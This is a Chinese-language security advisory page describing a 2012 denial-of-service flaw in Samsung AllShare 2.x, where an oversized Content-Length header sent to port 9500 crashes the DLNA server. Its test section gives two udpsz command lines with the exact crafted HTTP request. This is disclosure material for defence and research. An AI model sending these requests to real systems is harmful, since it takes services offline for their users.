Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Samsung AllShare HTTP标头处理拒绝服务漏洞

发布日期:2012-06-19
更新日期:2012-06-19受影响系统:
Samsung AllShare 2.x
描述:
--------------------------------------------------------------------------------
AllShare软件可使PC运行许多AllShare服务,通过本地网络回放流可在PC和其他设备之间共享视频、图片和音乐。Samsung AllShare在处理HTTP标头时,libpin3_dll.dll模块中存在空指针引用错误,如果"Content-Length"值是介于4294967262和4294967293之间,会在MSVCR90.calloc中造成意外。本地攻击者通过在"Content-Length"标头中包含较大的值并发送到TCP端口9500,可利用此漏洞造成DLNA服务器的拒绝服务。该漏洞位于lupin3 (libpin3)库内。<*来源:Luigi Auriemma (aluigi@pivx.com)
 
  链接:http://secunia.com/advisories/49209/
        http://aluigi.altervista.org/adv/allshare_1-adv.txt
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://aluigi.org/testz/udpsz.zip  udpsz -c "POST /DocumentViewer/Control/blah HTTP/1.1 CONTENT-LENGTH: 2147483647 " -T SERVER 9500 -1
or
  udpsz -c "POST /DocumentViewer/Control/blah HTTP/1.1 CONTENT-LENGTH: 4294967293 " -T SERVER 9500 -1建议:
--------------------------------------------------------------------------------
厂商补丁:Samsung
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.samsung.com/Linux 安全相关基础知识Joomla! Dione FileUploader模块任意文件上传漏洞相关资讯      拒绝服务漏洞 
  • 数字签名拒绝服务漏洞(CVE-2013-  (11/13/2013 12:25:03)
  • Intel 82574L Gigabit Ethernet   (03/01/2013 21:09:03)
  • Wireshark DTN Dissector 拒绝服务  (02/03/2013 10:37:43)
  • Rockwell Automation FactoryTalk   (04/10/2013 09:08:12)
  • IBM WebSphere Message Broker多个  (03/01/2013 21:04:45)
  • HP XP P9000 Command View   (02/03/2013 10:36:32)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您